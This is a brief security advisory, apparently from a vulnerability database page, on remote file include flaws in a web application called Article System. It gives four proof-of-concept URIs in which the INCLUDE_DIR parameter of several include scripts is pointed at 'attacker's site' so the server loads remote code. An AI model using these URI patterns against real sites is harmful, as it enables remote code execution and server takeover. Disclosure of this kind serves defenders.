|
Article System Multiple Remote File Include Vulnerabilities
An attacker may exploit these issues using a web client. The following proof-of-concept URIs are available: http://example.com/[script_path]/include/forms.php?INCLUDE_DIR=attacker's site http://example.com/[script_path]/include/issue_edit.php?INCLUDE_DIR=attacker's site http://example.com/[script_path]/include/client.php?INCLUDE_DIR=attacker's site http://example.com/[script_path]/include/classes.php?INCLUDE_DIR=attacker's site |
|
|
Privacy Statement |